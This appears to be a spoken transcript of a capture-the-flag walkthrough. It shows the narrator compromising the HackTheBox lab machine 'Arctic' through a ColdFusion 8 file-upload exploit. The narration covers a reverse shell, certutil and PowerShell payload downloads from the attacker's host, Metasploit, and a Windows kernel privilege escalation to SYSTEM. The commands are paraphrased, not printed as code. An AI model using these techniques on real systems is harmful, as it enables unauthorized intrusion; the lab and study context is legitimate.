Hey, what's up everyone? Welcome back to another episode of Naked CTF. In this series, I'll attempt to compromise and own a server from HackTheBox. This is my first attempt. I've not solved it beforehand, nor read anything about it. It's all done as one take with no editing, so this could be a 30-minute video or a 3-hour video. Let's find out. Okay, today we're doing Arctic, which is a easy Windows host. So, as always, just spawned it. We'll try adventure mode, use guided mode if necessary. And then as a last resort, we'll use the, we'll use the walkthrough. So let's just get our environment set up. Arctic is the name. I'll spell Arctic, and then the IP address. And helps if I remember the name of my own shell macro. There we go. And let's get our notes open. It'll be up here somewhere towards the top. Arctic, open a new tab, drag that over there, close that, and let's start our recon. It is a Windows box, so a little bit different from everything I've been working on recently. We expect all the regular Windows ports to be open, so 135 is the first hit. Let's just start documenting these as we go. And yeah, just trying to get back into the groove of things, keep moving towards that OSCP readiness to take the certification, feeling a little bit more confident, want to definitely try and get ahead of the minimum level or the kind of the technical bar that's expected. It is possible to say, well, I can do all of these CTF boxes without any stress, so maybe I'll just, take the exam and see what happens, but I'd rather kind of, in terms of study, working on tools, techniques, procedures, report writing, all of those skills, I'd rather get ahead of the curve in terms of what's required for the OSCP. So then I find the OSCP to be, medium kind of difficulty rather than hard, something I have to really struggle through and, potentially take again. So we've got a couple more ports that have cropped up, kind of slow on the port scan, which is a bit weird. Let's see what else comes up with. 49154 TCP. Yeah, that is super slow. While we wait, I'll just fuel up on some coffee. And that is it. It looks like for open ports. So now it's going to try and do the service identification and fingerprinting. Hopefully it comes back as something that is well known. Nothing too funky. It is an easy box, so we don't expect, anything too complex. And it is one of the older easy boxes, so if I had to guess, with the older Windows boxes on HackTheBox, I mean, this was released in 2017, yeah, so it's like over 5 years old. Is they generally, on the boxes that came out on the platform around then, for Windows, they tended to gravitate towards Metasploit as the tool that you use to kind of find your way through the foothold and post-exploitation. So we'll see if that's still the case. Whereas I think the more modern Windows and Linux boxes that are being put out these days require you to go and find a specific misconfiguration or find a specific exploit that may not be nicely available for exploitation through Metasploit. I do try and reduce my dependence on Metasploit for lots of different reasons. And I'm going to actually publish a video one day. I've got the script written, but I haven't actually recorded it yet. But yeah, about why I'm kind of avoiding Metasploit. Great tool, really cool. Amazing stuff, amazing bit of kit, but not something that I want to have as part of my early stage thing. Okay. So, wow. Okay, not a lot of information. Let's just have a look at the clean output. There it is. So we'll grab that and stick it in here. And yeah, so 135, 4915, and 8500, and nothing obvious listening on those ports. So yeah, that's a little bit odd. So it's definitely detected it's a Windows server, which is good. And what do we do? So let's run enum for Linux, and I can never remember the switch. Enum for Linux, and then just the IP. And let's just see if we can grab any additional recon information about this. So MSRPC, it looks like it's pretty locked down. FMTP question mark and RPC. So Windows FMR, what was it? FMTP. File multicast transfer protocol. Yeah, it looks like this is kind of a obscure. Yeah, look, here's a write-up for it. Secure encrypted version of RTP used to transport voice and video streams over IP networks. I'm familiar with RTP, but it was just guessing. It doesn't actually know that FMTP is the thing there. So, known usernames: admin, guest, Kerberos, ticket service, domain admins, root, bin, none. I think root and bin are unusual. Unusual usernames, as in they're not necessarily Windows defaults. Okay, what do we do next? So, let's just read Hacktricks 135. This is generic MSRPC pen testing, and yeah, we really want to figure out, like, is this an actual service that we want to pursue in terms of enumeration? Maybe, maybe not. If you have valid credentials, you can execute remote code. Well, we don't have valid credentials. Bit of research material from Airbus there. Good to see. Love it. Okay, we might park that for now. 49154 is probably the same, but it's an actual service from the RPC mapper. Like, this is the high order port. I mean, we can check. Windows port. Yeah, I don't think it's going to be anything. It's a high order port. Xsan file system access. Well, that's, you know, a particular app that's grabbing that port number. Yeah, and it looks to be like a Mac or Mac OS. I don't know. SAN solution includes metadata controller, file system client, blah, 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 blah. All right. What happens if we telnet to 8500? I think that's where we can turn our attention to. IP 8500. Hello. Oops. 8500. Connection closed by foreign host. It doesn't seem like there's anything listing there. Like if it was a web server, I would have expected it to respond with a HTTP request. 10, 10, 10, 11, 8500. But given I didn't send a valid I didn't necessarily send a valid HTTP request. It might, depending on the implementation of the server-side HTTP server, it may not give you a response at all. Huh. So, what to do? What to do? Where to go? Okay. Oh, it did reply. Eventually. Oh, I know what this is. CFDocs, CFIDE. This, my friends, is a Cold Fusion server. And the reason I know that is because I spent many years developing in Cold Fusion. And I remember always looking up CFDocs. And this should be the Cold Fusion documentation. But it is slow. God. I wonder if that's why it's called Arctic. Because it's just frozen all the time. Yep. I even kind of remember that directory structure. Yeah. Installing and using Cold Fusion. CFML, that's the markup language. That's the kind of the sysadmin guide, and that's the developer's reference material. Cool. And CFIDE, don't quite remember that, but wouldn't surprise me if it's like a browser-based Cold Fusion development environment, something like that. It's interesting is whenever it didn't get picked up as by Nmap as a HTTP server because it was just so slow. But it instantly fills the connection. Yep, application.cfm, that's kind of where all your global stuff goes. Yeah, I think this is the install wizard, the install stuff. Install. Man, this is taking me back. 1999, 1998. Now, it'd be interesting whether it actually renders the Cold Fusion output, like it'll run through. Yeah, okay. So it's super broken. And we've got a basic kind of debug message here that an include was missing. But it doesn't have a reference to the version. So I'm looking for the version of Cold Fusion now. Running Cold Fusion server version x.x question mark. CFDocs and CFIDE directory with the listings enabled, super slow web server. Yep, application is the same. Oh, that's how old it is. You can see if you look at this URL, it's referencing an external site, which is Macromedia. Now, Macromedia was the original developer of Cold Fusion, but they sold it to Adobe. When did that happen? Cold Fusion sale to Adobe. Yeah, JJLA, I remember that name. So we can kind of roughly find out Oh my god, it's almost 30 years old. Released on July 2nd, 1995. Alea was, in 2001, Alea was acquired by Macromedia, which was in turn acquired by Adobe. So, okay, so Macromedia was in the original. It went to Macromedia. Flash and Dreamweaver. Oh, okay, so same company that made Flash and Dreamweaver, acquired by Adobe. Very cool. Yeah, it's got this CFML template tag style language. So if it's referencing Macromedia, it's got to be 2001 or earlier. So it's either 5 or version 5 or earlier. Vulnerabilities. Targets all recent versions. Right. So looking back over this, these RPC services are whatever, I don't know. Possibly a bit of a decoy or red herring in terms of finding a foothold. This is definitely the most interesting one. An old version of Cold Fusion. Yes, please. Oh my god, yeah, I remember this. This snippet that would close out any kind of dangling HTML tags. Oh my god. Is definitely not W3 standards compliant these days. No reference to version or just Verdana font. Okay. Yeah, so application.cfm runs at the beginning of every request, and this runs at the end. This is like your kind of if you put this in the root of your Cold Fusion app, it will get included with every request. And if this exists, I think it runs as a synchronous or asynchronous request. So you can put things like clean up and everything else on a request by request basis. Okay, so let's go and grab our fan search exploit called Fusion. It's quite a lot. Now, 4.0 is still called Lair. So that's probably before Macromedia. So these ones are all Adobe. Well, we shouldn't rule them out because they might have been something that existed for a long time and only got fixed once Adobe took ownership of the product. Okay, so we have wizards. We don't have administrator, as in that path. CS cross-site scripting anyway, XSS. Arbitrary file read. Decrypt pages. Information disclosure. Arbitrary file upload and execution. Okay. That's a Metasploit module. Credential disclosure is not going to give us, it might give us a foothold. Cross-site scripting, remote development service, CFIDE, I don't know. Let's just try. I don't know. Version 8 seems a long way from 5 or something like that. Let's have a look at this one. Even though it's a Metasploit module, we'll take a squeeze at it. Boom 167. At least we can understand what path it's targeting, so we know if we have that path available. Okay. Yeah, so you can see CFIDE, scripts, Ajax, FCK editor. Oh god, I even remember that. CFIDE, scripts, Ajax, and then FCK editor was a HTML-based rich editor that you could embed in your web application. Very popular at the time. I wonder if it's still around. Uh, 2014. FCK editor is no longer maintained. RIP. Oh. But they transitioned to CK editor, dropped the F, which is good because that kind of sounds like bleep editor. And it's all JavaScript based now. I mean, it was JavaScript before, but. So what was it? Scripts, Ajax. Wait like 10 minutes for each directory listing to be returned. I wonder if this is normal or if I just got a bad boot on this box. I mean, it is pretty old. FCK editor. I should just type the path. Editor, file manager, connectors, CFM. I just want to see if this path that's being used in this exploit exists. So at least we know that if we try this, it's with good cause. And what does it do? So it takes a payload editor, file manager, connectors, CFM. Editor, file, editor, file manager, connectors, CFM. And then we're looking for upload.cfm. There it is. Okay, so let's try this CVE. I think rather than trying to use the Metasploit module outside of Metasploit, I'll just see if there's another proof of concept for this. 2009 2265 ColdFusion 801. Unauthenticated users to upload files and gain RCE on the target host. Yep. Okay. Okay, so he's just kind of walking through his PSC code here, which is cool. And so Cold Fusion is actually implemented in Java. So it looks like they are sending a JSP page, or is it JSP? I don't know. But this is the actual reverse shell code. It's not written in Cold Fusion itself, but it's written in Java. Or some derivative of Java. Then he sends it using his Python script, using the request module. Okay, cool. This is really well explained. Yeah, JSP. Okay. So, what can we do? This is how we call the functions, taken from following variables. That's the command line arguments. So the remote host we're attacking, the local host that it's the reverse shell connect to, and the port it will connect on. Okay. Well, let's hope it works, because this web server is extremely freaking slow. This is a very nicely written piece of Python exploit code compared to one that I was dealing with yesterday, which I had to spend a few hours deciphering. Okay. Python 32265. Right. Remote host is going to be HTTP, IP, and then what was the port? 8500. 8500. My host is going to be 10.10.14.30, and my port is going to be 1337. A fellow 1337 connoisseur, I see. Good man. It's kind of lame and stupid, but I like it. So let's set up our listener. NVLP 1337. Go. Now, I think this is going to be extremely slow, to the point where we might even have to fiddle with the Python script to adjust the requests module HTTP timeouts, like as the client. Because I got a feeling. Oh, hold on to your beer. Okay, so the upload went pretty fast. No. So can we just call this? Oh no, there it is. It was slow, as expected. So let's just make that a bit smaller. And then move down to, yeah. Yay. Okay, foothold. Aha. Look, that was a lucky stab in the dark that this was the right CVE, but sometimes you get lucky. So what I want to do is grab this and say foothold obtained using it. And then we'll grab the Windows version, even though we're going to do some few further enumeration now. So let's have a look at our privileges. Nothing really substantial there. Notify, impersonate, that's useful. Okay. Who am I all? So the user is TOLIS. These are my groups. Everyone uses authenticated users, blah, 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 blah. Okay. And then that's the privs that we've already seen. So we'll just grab all of that. Stick it in our notes. Let's just have a little poke around. So given we're running in the web server context, we're going to be dropped into the working directory, which is where the Cold Fusion runtime exists. Cool. Dir. Now, how old is this machine? We don't really want to poke around the ADE stuff because it's just likely going to be a standalone machine, not part of a domain. Have a look through the environment variables. We will grab that. Okay. There. And there's a bunch of crap in the root of C. Probably just you know, leftover artifacts from various installers and everything else. There we go. What I wanted to do was see if we can find the flag, the user flag. Usually it's on desktop. There it is. And we'll bang that in there. Right. What next? So the first kind of step is achieved. We really need to think about Privesk at this point. So Cold Fusion was used for foothold. Can be exploited further for Privesk? Question mark. Let's have a look if there's any other software running on here which is kind of non-standard. So program files. That's all vanilla. Program files x86. Dir. That's also very vanilla. Huh? Duh. CD program files. Duh. Program files 86. Duh. Yeah, I've never seen that before where the program files and program files x86, so the 32 and 64-bit program files directories are identical. I mean, they're not quite the same. There's no VMware one in here. But yeah, normally you would expect a few other bits and pieces to be lying around in there. But hey, it is what it is. So, do we have cert util? Yes, lovely. So what I'm going to do at this point is upload WinPs because I'm feeling a little bit lazy. Not lazy, smart, working smart. So let's do that. I've got it lying around here somewhere. WinPs any.exe. We'll just rename that peas.exe. We need somewhere we can... let's start this first. Python 3 m http.server. Then we want somewhere we can write. So users, all this desktop. Yeah. Okay. So we can definitely write here, I would imagine. Then we want cert util. Nope. Unorganized. Really have to clean these up. Oh my god. It's even telling me I've got to research it. Lol bin cert util. Lol bass. Lol bass for Windows. Yeah, that's the one I want. Cert util URL cache split. Cert util URL cache split. -f URL http 1010 1430 8000 peas.exe, and then the local file name peas.exe. Go. Please work. Got it. Okay. Let's go peas. Let's go peas. Let's go peas. What am I doing wrong here? Let's try PowerShell. Yeah, this thing is slow AF. But that's okay. It is a virtual machine. It is an old one. Come on. Where's my prompt? Come on. Hello? I mean, it must be like paging so hard from memory to disk and disk to memory. Or it's CPU bound or something. I wonder if they do this intentionally. Oh wow. Okay. Anytime now. Come on, buddy. Wake up. Yeah, let's just buzz through some of these. Old Fusion. CVE 2010. We didn't use 2010. We used 2009. Oh, that's a different... Oh man, we went we went off-piste. We didn't use this 2010 vulnerability for directory traversal. So one thing I have got in my notes here. Suggester that I've been wanting to try out. Yeah. Windows exploit suggester. Now, this is similar to but different than the exploit suggester that's in Metasploit. And holy crap, it's old. I did not realize. But supports up to Windows 10, which is good. So yeah, you run system info and then it will look at all the hotfix information, what's installed on the host, just in terms of what might be vulnerable from a Windows perspective, not necessarily an application perspective. Because it's not going to, like, system info is not going to provide you with all of the... it's not going to provide you with all of the data about what's installed on the box, but it'll provide you with everything about the operating system. So you run system info in here, and then you run this script across it. And then it will... Excuse me. It will give you a list of potential vulnerabilities, right? And, you know, you wouldn't really care about Internet Explorer because you can't, through the Rev shell, you can't necessarily access a interactive session, desktop session. So we might give this a try. So it doesn't look like there's, just going back to our Priv-esque thinking, does not look like anything else installed apart from Fusion. And then if we were to check search exploit again against Cold Fusion, I don't think I saw any kind of local Priv-esque type stuff, right? Directory traversal, LDAP, RCE, file upload, RCE. So we've already achieved RCE effectively. Authentication bypass we don't care about. These are all XSS. Arbitrary file read. No. So I can't see anything there from a Cold Fusion perspective that we could use for Priv-esque, right? This is all about, you know, Cold Fusion exploitation of Cold Fusion itself. So my working theory is that from this box's perspective, unless there's some credentials stashed away in the Cold Fusion directory somewhere, we should definitely look into that. Good old hack tricks, Cold Fusion. Cold Fusion credentials on disk. Admin login and password recovery. Yeah, just thinking like if there's an Cold Fusion user that exists. We might be able to try password reuse. Resetting a lost Cold Fusion password. No. I mean, this is old stuff, right? This is... 2010 was 14 years ago. Oh my god. Crack. Fusion password. Okay, that's more at the, you know, how do I safely store passwords in my Cold Fusion app? Script to decrypt Cold Fusion database passwords. The default Cold Fusion encryption key. Uh-oh. Neo data source, neosecurity.xml. Let's have a little poke around in here. What was the path? C Cold Fusion. Cold Fusion. Cold Fusion 8. DB. Oh no. No, not a Derby database. Oh. I had huge problems working with Derby in another box. Drove me nuts. Properties. Derby.log. Logs. There is no Derby log. Art gallery. Book club. I think these are individual apps. SQL link setup. What is console? Just adjust my aircon because it's starting to warm up. Okay. Yeah, I think I remember Book Club being like default, like sample application. 60. Right. So if we go back to our thinking here, let's look for Windows vol p vol first, then can go deeper on CF if required. So I want to try this Windows exploit suggester. So we run system info and we go up, and I'm just going to cheat and make the font size smaller. See, it has the has the build information, but it doesn't have the hotfix. I thought this spat out like all the individual hotfix KB numbers. Yeah, look at that. Physical memory 6. No. That must be after VMware has run its balloon driver and everything else. That can't be. Windows can't boot with that. So anyway, look, I'm just kind of dawdling here. So let's do exploits, Windows exploit suggester. Then we're going to do vim systeminfo.txt. Stick all that in there. And now we'll go and grab the code. So it's Windows 2008, even though this is old. Even though this is old, it's probably older than, it's probably newer than Windows 2008 R2. So let's grab the raw. And then we do vim ws.py. And I did, wow, it's a long script. I did notice there's a hash bang for Python at the beginning, so we can probably just do chmod +x and do ws.py. It should be okay. Nope. Maybe it needs Python 2. Okay, not enough arguments. So I know the first thing is it needs to go and like kind of fetch a bunch of metadata. So we do -- update, tac. Now we've got this XLS, which is 2 meg. Then we do database 2024 system info sys.text. That's it. We do have to pip install xlrd pip 2. There's pip 3 and a pip 1, or pip 0. Pip install xlrd. Try again. Nope. Pip 3 install xlrd. Already satisfied. Maybe we need to do it as not a, yeah, we need to run that sudo so it installs as a global site, kind of machine-wide available. Yeah. Oh my god. Right. I'm grasping at straws now. Python xlrd. System info command reveals file 1 as the output for the hotfixes, not be able to determine which are installed on the target. Did we get hotfixes? Anyway, so it has no hotfixes installed. Well, it's definitely vulnerable. Like if this is a default Windows Server 2008 R2 build install, it's going to be full of holes. It's going to be full of vulnerabilities from a Windows perspective. And if we could get P's working, cmd/c keys.exe. If we got P's working, it would probably also find a vulnerability, but we're trying to use this tool and install XLRD. Yeah, pip list. Pip lists. XLRD, yes. Don't use Condor in here. Restart your Python environment. No, it's got to be a Windows thing. ws.pi. Nope. Undo. XLR. Update the XLRD library. No, we're using the latest. I'm thinking, what if we were to remove this? Oh, that's hashbang. Yeah. Let's just delete this. Huh. Okay. Oh man, this thing is ancient. Bulletin URL is valid. Okay. Is there a fork? Forks. I don't want to fork it. I want to see if there's other forks of this. GitHub find forks of project. Insights, then forks. Insights. Forks. Updated 10 months ago? 3 months ago? Forky McForkface. Wow. Whoa! This guy, he lives up to his name, Forky McForkface. 3 months ago, yeah, looks pretty good. Let's have a look. Now, has he actually done anything to it? Three commits ahead. He's just added some GitHub actions. So what is Forky McForkface all about? Yeah. I think this guy is up to something. Updated 10 months. Oh, updated for Python 3. Yeah, look at this. Oh, goodness, I love open source. Someone has gone through and done a serious amount of work on this. And yeah, beautiful, lovely. Let's try it. And open PyXL. So let's grab this. Yeah, look, I'm just trying this out. I'm seeing if this is another tool that I can put in the tool case, you know. There's probably a more efficient way to do this. Like I said, WinPs would be a good way, but it's a bit clunky at the moment. So chmod plus x was 3.py. Was 3.py. Okay. Update. Done. Now we've got two of these, which is the right one. XLSX. So let's RM this guy. And then let's run. Go back to the syntax. Nope, here. Nope, back here. What a legend. Big shout out to Ponistry. Thank you, my man. Or lady, whoever it is that worked on this. So we've done the update. Now we want database 2024 what was it? System info. It's going to be systeminfo.txt. Go. Oh, looking good. Looking good so far. Hopefully it will actually output something. Come on, come on. Don't do me dirty. Windows exploit suggester patched for Python 3. Come on. Come on now. So that's it. Based on the extension. Okay, maybe we need to install this. pip3 install. What was it called? Open PyXL. Oops. Oh, whoa. pip3 install open PyXL. Go. Already satisfied. Dang it. Go. Because it's here. Like we see that alert. Or maybe we're here. Loop through. Can't be that big, right? There's only 2 meg of data. Okay, loops. Haystack. Where's the update logic? Because that seemed to go awfully fast. Bulletin URL. Oh man, I don't know if this is working or not. It seems to be taking a long time. No. Where's... Oh, it's an actual... Yeah. XLSX, which is actually a zip file. 2 meg. Where's 3.py update? Done. I mean, it seems awfully fast considering it should be running off to... it should be running off to grab a URL, parse the output. This guy just will not run. PowerShell, so let's kill that. Let's get our shell back. Let's see if we can find a way to run the Ps. Windows CMD run exe. I think it's because the /k. I think it's because the shell is like kind of busted. So it's not recognizing that it should invoke. CMD /k peas.exe. It just echoes back to me. What the hell? Get a bit lost here. This guy's still not working. The update doesn't appear to work, like it just says done. It doesn't even appear to pause to make a outbound connection. Yeah, let's try the full path. C users Tolius desktop keys.exe. Two three eight seven 968. 32-bit executable. .3. Yep. What is going on here? Why can't I run? I mean, like things like CD, not actually executables. I think they're part of command.exe. Windows, reverse, stabilize, reverse shell. Yeah, this I've definitely read about before, so I'm going to try this. I just want to actually get in the habit of doing this. I have LR wrap installed? No. Sudo apt install rl wrap -y. Yeah, apparently this addresses quite a few problems using rl wrap for netcat. Don't actually know what it does. Runs the specified command interpreting user input in order to provide read lines, line editing, persistent history, and completion. Okay, so it like kind of provides a shell within your shell. Yeah, okay. All right, well, let's give it a go. So we run rl wrap. Then we run our exploit again. Sit around and wait. This thing is just busted. So we're in main. I mean, is it stuck in this loop somewhere? Update. Let me go a bit old school here. LibreOffice. Open file. Arctic. Where's this actually look like? Okay. I mean, maybe you're just fetching it. How many rows is this? Only 19,000 rows by... Yeah, it's not a lot. Only 19,000 hotfixes. Alright, let's give it another try. Go back to our shell. Oh, nice. I'll wrap honors control characters. So CD users tollist desktop keys.exe. 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 Yeah, something. Man, there's something wrong. Something wrong. If it runs system info, that executes immediately. Env path. Oh, dang it. So while this is all kind of going, let's go to plan C. And we will capitulate and try Metasploit. Just for the sake of getting this done. Search Cold Fusion. Cold Fusion. That's the one we want. Use 6. Show options. Set G L hosts 10. Set G L port. Yeah, for 4444 is fine. That path is fine. Set R hosts is going to be 10, 10, 10, 11. 10.10.10.11. Set R port. Our port is going to be 8500. vhost we don't care about. Universal Windows target payload is going to be generic shell reverse TCP now. I don't know if that's going to work or if it's going to need a JSP payload. I don't know. Maybe it... Oh, okay. So it knows how to exploit Cold Fusion, and that's what it's going to upload and run. Okay. Okay. Upload failed. Now, that's probably because this thing is so freaking slow. Windows exploit suggester. Where's NG? Oh, this looks more active. Ooh. Okay, let's try this. Sorry, Wes, old Wes. We got a new Wes in town. Wes NG. And it's got NG in the name, so it's cooler than you are. Pip install Wes NG. Okay. Then we want to where's.py? No. Okay, let's just grab the repo. Can't be bothered stuffing around with anything. Where's ng? Where's.py? Nothing like running untrusted code. Update. That seemed a bit more legit. Depending on the method chosen in step 3, which was this one. So we want to run that. So we're going to copy where's system where's system info to here. And we're going to run where's.py system info.txt. Oof. All right. 108 missing patches. Goodness. Okay, this is a lot to go through. So, just like with the exploit suggester and Metasploit, we really need to kind of pick the more, I guess, popular ones rather than the more obscure ones. Holy moly. Okay. So let's output this to potential vuln.txt. Oops. And let's do vim potential vuln.txt. Okay, so anything that's exploit NA. Maybe that's referring to Metasploit exploit. Oh, good God. Yeah, so the same, when you use the Windows exploit suggester in Metasploit, you still have the same problem. Like you get a list of 15 or 20 back and you got to kind of be very selective about which ones that you want to try and go for, I guess. Let's see here. Okay. So really we're looking for anything that falls into this impact category. Do any of these have an exploit? They all have NA so far. Just wondering whether any of them have. Yeah, you see, there we go. This one, potentially. Vulnerabilities Windows kernel could allow elevation of privilege. And then there's a working exploit that's kind of tagged to it. Exploit DB bypassing UAC with user privilege. But when I see bypassing UAC, that would imply that you need a interactive session. So let's just do where's ng vim shortlists.txt. So let's put that CVE 2010 4398 UAC. Okay, what else? Just reading through some of these. No exploits. Let's just filter whether there's an exploit or not. That'll be our first kind of pass. Because otherwise we'll be here for another 6 hours. Trying to sort the wheat from the chaff. Wow. It's a lot of vulnerabilities. Oh. Microsoft Foundation classes. Moderate. Going to disregard that one for now. And then here's the actual KB. So this KB number, which is a Microsoft knowledge base article. So weirdly, the patch is identified by the KB number. This particular one patches 10 vulnerabilities. That must have been a very busy month. It doesn't have a service pack, which probably rolls up a lot of these. And, alright, so we got one that kind of lists all of the filters that we initially applied, right? So number one, it's listed as a privesc vulnerability. Number two, it's got an exploit. In fact, it's the only one that matches that criteria. So if we do search exploit, CVE 2010-4398. Okay. It did say it had a CVE 4398. Let's copy this link. 15609. 156. Is that it? 4398. 15609. Search exploit. 15609. Windows 57. I mean, it's a bit of a long shot. Let's try it. Feeling lucky. Even though it says Windows Vista /7, it's probably the equivalent in terms of code, like the kernel and code base and everything else is Server 2008. A lot of it's packaging and everything else between the Windows versions. After Windows, I think it's 2000, they unified Windows 2000. They unified the server and desktop code bases and unified everything. So let's have a look anyway. Yeah. Vim 15609. Excuse me. Yeah, I see it lists 2008. 2008 R2, more importantly. And then this is pointing us towards this guy. So let's less 156. Can we just read a little bit more about this? I think this is a mirror of exploit DB. Official repository of the exploit database. Yeah. Okay. Love running. Even better than running untrusted Python scripts and shell scripts is running untrusted binaries. So what was that called? .15609.zip. Downloads 15609.zip to here. Unzip 15609.zip. Oh man. So not only did they give you the binary, they give you the like the Visual Studio project if you wanted to compile it yourself. POC README. That's boilerplate Visual Studio. So I guess, but we still have this issue where we can't run binaries, or my binary more specifically. I wonder if when I'm trying to run Ps, it's actually triggering UAC. Nah, I don't know. Let's see. Cert util curl cache minus F. I can't remember. Lolbass. Cert util split. Split minus F HTTP 10.10.14.30 POC. What was it? POC.exe, right? .exe. POC.exe. Oh no. I'm really kind of confused about this. Reverse command shell exe not execute. Spawn reverse shell will not run additional commands. Okay, this guy has the same situation, but no answer. Okay, I'm pretty sure I'm doing that. Go to C, Windows System 32. Okay, let's try that. Windows System 32 cmd.exe. Okay, that's better. Users Tolless desktop ease.exe. No. Goodness gracious. PowerShell work now? Nope. Starting to get a bit frustrated. Everyone keeps saying run Windows commands, not Linux commands. I'm pretty sure the dude is good. I think he's got that part. Never actually come across this before. Do we attempt the reverse shell within the reverse shell? Oh, this could be meta. Let's try it. Ten dot 10.14.30 and 338. So I'm basically going to spam this into this shell and see if I can get a more stable reverse shell. So ncat rl wrap ncat nvlp 8 back to here, copy, delete, paste. Good luck. Oh, hello. Now we've got a PowerShell shell. So the old reverse shell within the reverse shell trick. Users, Tolius, desktop, come on. See, it just launches, nothing. Has to be some policy or something that's stopping me from doing this, like an untrusted binary. Which kind of reinforces the idea that this vulnerability that we looked at Could be the right one because it's actually going to evade UAC. Let's read more about it. Why would Ubuntu care about this? Is that what it's called? Suite 32? Yeah, that works nicely. I'm starting to get a bit desperate here. Try this guy again. I wonder if we can trigger a reverse shell and then have it captured by interpreter. I've done this before. Okay, first of all, let's try the different payload. Show options. Show options. Show options. Set payload. Java. Java JSP. Shell reverse TCP. I mean, that makes sense because the other exploit is using JSP. It's the payload. Nope. Metasploit. Timeout. Timeout control. Session timeout. Interpreter. Oh, God. Exploit timeout. I mean, it's saying it's failed. It doesn't say it timed out. All right. Just thinking, what can we do? What can we do? All right, screw this. I'm going to the hints. Or, sorry, the suggestions. 2010 CVID for directory traversal into CFM. I thought we had that open somewhere. Didn't we? Yeah. Directory traversal. Let's just Google it. Cold Fusion 2010 CVE directory traversal. 2861. Which we didn't end up using, by the way. So, I don't know. Maybe we've missed something fundamental here. Which Metasploit reconnaissance module can be used to list possible privilege escalation paths on a compromised system? Exploit suggester something? Post multi-recon. Use post multi-recon. Local exploit suggester. Local exploit suggester. What is the password for the Cold Fusion admin login? I don't know. Many POCs for the exploit show reading a file that leaks a password hash. Get that and crack it. Ay, ay, ay. We may have gone completely the wrong direction. So, password.properties? Let's go back to our shell. Cold Fusion 8. There. Root. There. CFID. Administrator. Security? I don't know. Application.cfm. Whoa. Compiled into other bytecode, it looks like. Okay, so there's an NSC script. I mean, are we actually doing this in our... Are we doing this in our exploit? No, it's different CV altogether. All right. Well, let's try this. No, let's not do that. I mean, we can we just go to this path? Cold Fusion 8 lib password.properties. Okay. So that's just leaking the same file that I can access via the rev shell. Salt. Okay. What was that one we were looking at before? Cold Fusion 8 password.properties crack. Salt hash. That's a HMAC. And crack the admin password first. RDS password. Hmm. I can reset it. But that won't give me what the current password is. Hashcat HMAC. So if we can grab Alright, I'm getting bundled up. Like, I don't know. I feel like I'm gonna have a look at the write-up here. I've gone very much off-piste. However, due to the request delay to the target, the module fails to run. Okay, so Arctic is deliberately slowed down. Wait a minute. Okay, so in their scenario, in the write-up scenario, they're uploading a Meterpreter shell rather than a JSP shell. And then they're catching that in okay, then they upgrade it to Meterpreter. Then they run local exploit suggester. And then they target this one, MS10059. Man, oh man. All right. Okay. I think I'm just going to, for the sake of brevity, like we're kind of on the right track. We got the foothold as a non-privileged user, but definitely went a different path. And yeah. Okay. So if I follow this logic, right, and I create a Meterpreter payload, shell.exe, oops. Okay, so now we have an Meterpreter payload, and I guess we run python -m http.server. Python 3. Then we go back to Meterpreter, and we do use multi-handler. Windows Meterpreter. Oh, come on. Yeah. Kind of the generic one. Reverse TCP. Yeah. This is going to be my local address. 4445. And we start that. Okay, now it's listening. Then I go to here and I rebuild this with the correct IP address. 10.10 14.30 4445 shell 2. Now this is interesting. This is how they have executed the binary as a PowerShell one-liner. So is that something I could have been doing all along? Let me just test that out. New object. No. You see, that's to download it and then execute it. So I do have my doubts whether this will work. Desktop. poc.exe. keys.exe. Task list. See, given how many CMD processes are running, it's not like Peas is backgrounded or something like that. Okay, let's try. Okay, so we're gonna go back to here. Python 3 web server. Go back to here. PowerShell. New object. System.net. web client dot download file http 10.10.14.30. Think I would know that by now. 8000 shell 2.exe. Close. No, don't close. Shell 2.exe. Close quote. Close that. Close double quote. I mean, certutil works better. That's, well, not that I can remember the syntax for either, but it's just as good. This is just a fancy way of doing it. There it is. So we got the HTTP requests. And yeah, this seems to be this eternal problem with my shell, is that I cannot my goodness. This one is now dead. Okay, let's get our one-liner here. Come on, wake up. And we should have a session here. Then if we go back to users, Polis, desktop, there's shell 2. If I try and execute it, oh, we're going to need, no, the listener is interpreter. So with any luck, it'll connect. Opened. Haha. Okay. So this is where I start to run out of Metasploit knowledge. Run? No. Use session. Sessions. Uncell. Sessions. How do I list the sessions? Session 1. Okay, so we're already in the interpreter session. Okay. So then we're going to run this. We're not actually in a shell. We're in the interpreter kind of layer that sits above the shell. Run. Never got the admin password. So even in the walkthrough, yeah, even in the walkthrough, it doesn't talk about cracking the Cold Fusion administrator password, which is a bit strange, because then it doesn't line up with this. So we're going to use the Schlelevator. Oh my goodness. So was it MS010, MS1092? Yeah, Schlelevator. Target is not exploitable. What? Yeah, different output. I don't know if that's because I've gone wrong somewhere, but the intended vector was MS10059. Oh, 010. MS10059, MS10092. So either that's a typo. Oh, okay. Alright. Run. Paste L post equals ton 0, L port equals 4442. Set auto check false. Use exploit Windows local MSC. It's saying that it's not vulnerable. 092. Use exploit Windows. Auto check false. Must migrate our shell to a process running on x64. Yes, I have done this before. So we find a nice juicy process running as x64. We grab the PID 1152 and then we do, let's use the same binary that they used. J run service. Migrate 480. Migrate 480. Oy. 1152. Okay. Now we run it again. Oh, goodness. Background this session to, no. Sessions to shell, who am I? NT authority system. Oh boy, oh boy. A little bit disappointed. Not gonna lie. I managed to just get totally tangled up in that. That is a good example of, yeah, what not to do. Absolute Barney. So, I think the lesson here is that when you have something that's really old and has multiple vulnerabilities and everything else, you do really need to kind of detangle them all and probably enumerate them one by one. So there was, you know, 2 valid vulnerabilities there. Directory traversal, which could leak the admin password. And, you know, if I had the admin password, I could have gone in there, you know, messed around, potentially gotten a shell another way. So there was just so many pathways with this particular box. Yeah, and I think I just got really kind of tangled up and mixed up towards the end there. So, yeah, but all in all, still good fun and educational as always, and learnt a lot and, you know, all that good stuff. So, enjoyed it. We'll definitely be, you know, I think what was cool was just that whole learning exercise about local Windows exploit suggester tools. So we started with the old one. We knew that there was one in Interpreter, in Metasploit, but didn't want to kind of tried to avoid Metasploit for various reasons. Not because it's bad, but because trying to do things by hand rather than using the beautiful, clean automation of Metasploit. But ended up using it in the end anyway. And yeah, just going through the kind of learning exercise of figuring out what those suggested tools are. Now kind of settled on WESNG, so Windows Exploit Suggester NG, which has different options. You know, it can read data remotely, it can run on the box itself, it can run on your local box with just Windows system info output. Really, really cool. So definitely a lot of notes. I've got so many notes to catch up on. I need to really take a day and sit down and do this. So hopefully the somewhat organized notes markdown page will become bigger than the unorganized notes page, hopefully very soon. So with all of that said, thank you very much for joining me. If you stuck around to the end of this video, have a great morning, 